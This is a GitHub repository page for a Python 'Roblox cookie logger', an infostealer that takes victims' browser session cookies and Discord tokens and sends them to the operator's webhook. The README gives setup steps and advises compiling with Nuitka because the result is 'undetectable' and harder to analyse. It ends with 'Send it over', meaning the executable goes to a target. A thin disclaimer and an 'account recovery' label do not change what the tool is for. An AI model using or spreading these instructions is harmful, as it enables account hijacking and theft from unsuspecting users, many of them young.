Skip to content

Fast and efficient Roblox cookie logger made in python

License

Notifications You must be signed in to change notification settings

pebriv/Roblox-Cookie-Logger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

DISCLAIMER

This is not to be used for any malicuis intent, I made this purely for a program that detects if you are using an unlicensed version.


Logo

CronicCookie

Smooth and quick cookie logger for account recovery.
View Demo · Report Bug · Request Feature

Table of Contents

  1. About The Project
  2. Getting Started
  3. Usage
  4. Roadmap
  5. Contributing
  6. License
  7. Contact
  8. Acknowledgements

About The Project

Welcome to the newest release of Cronic Cookie, a speedy cookie logger. This is my main project and I am working more and more on it. This will probably become an anti skid which steals the cookie and token of a person that downloaded a leaked copy or leaked it.

Built With

Getting Started

To get a local copy up and running follow these simple steps.

Prerequisites

This is an example of how to list things you need to use the software and how to install them.

- Go to the folder with all of the files.
- In the navigation bar (C:/User/Desktop/Roblox-Cookie-Logger) delete everything and type cmd, this will bring up "the shell".
- Now install the packages as instructed.

Installation

  1. Download the .zip of this repository
    git clone https://github.com/DaEpicSwag/Roblox-Cookie-Logger.git
    
  2. Install PIP packages
    pip install nuitka
    pip install requests
    pip install browser_cookie3
    pip install discord-webhook
    

Usage

  • Replace your webhook. If you are using the advanced logger, make sure to fill in the webhook for the token logger and the cookie logger which are in diffrent locations.

  • Compile to exe using nuitka PLEASE AND NOT PYINSTALLER. Why?

1. Harder to crack because Pyinstaller just unloads the source into the temp directory
2. Undetectable
3. Faster
4. Smaller file size that works well when compressed.
  • Nuitka How To
1. Access the "Shell"
2. python -m nuitka urfile.py
  • Send it over.

Roadmap

See the open issues for a list of proposed features (and known issues).

Contributing

Contributions are what make the open source community such an amazing place to be learn, inspire, and create. Any contributions you make are greatly appreciated.

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

License

Distributed under the MIT License. See LICENSE for more information.

Contact

Discord - @SonicTheHedHog#0001

Project Link: Roblox-Cookie-Logger

Acknowledgements

  • PogScriptR Thanks for the request webhook explaination

About

Fast and efficient Roblox cookie logger made in python

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages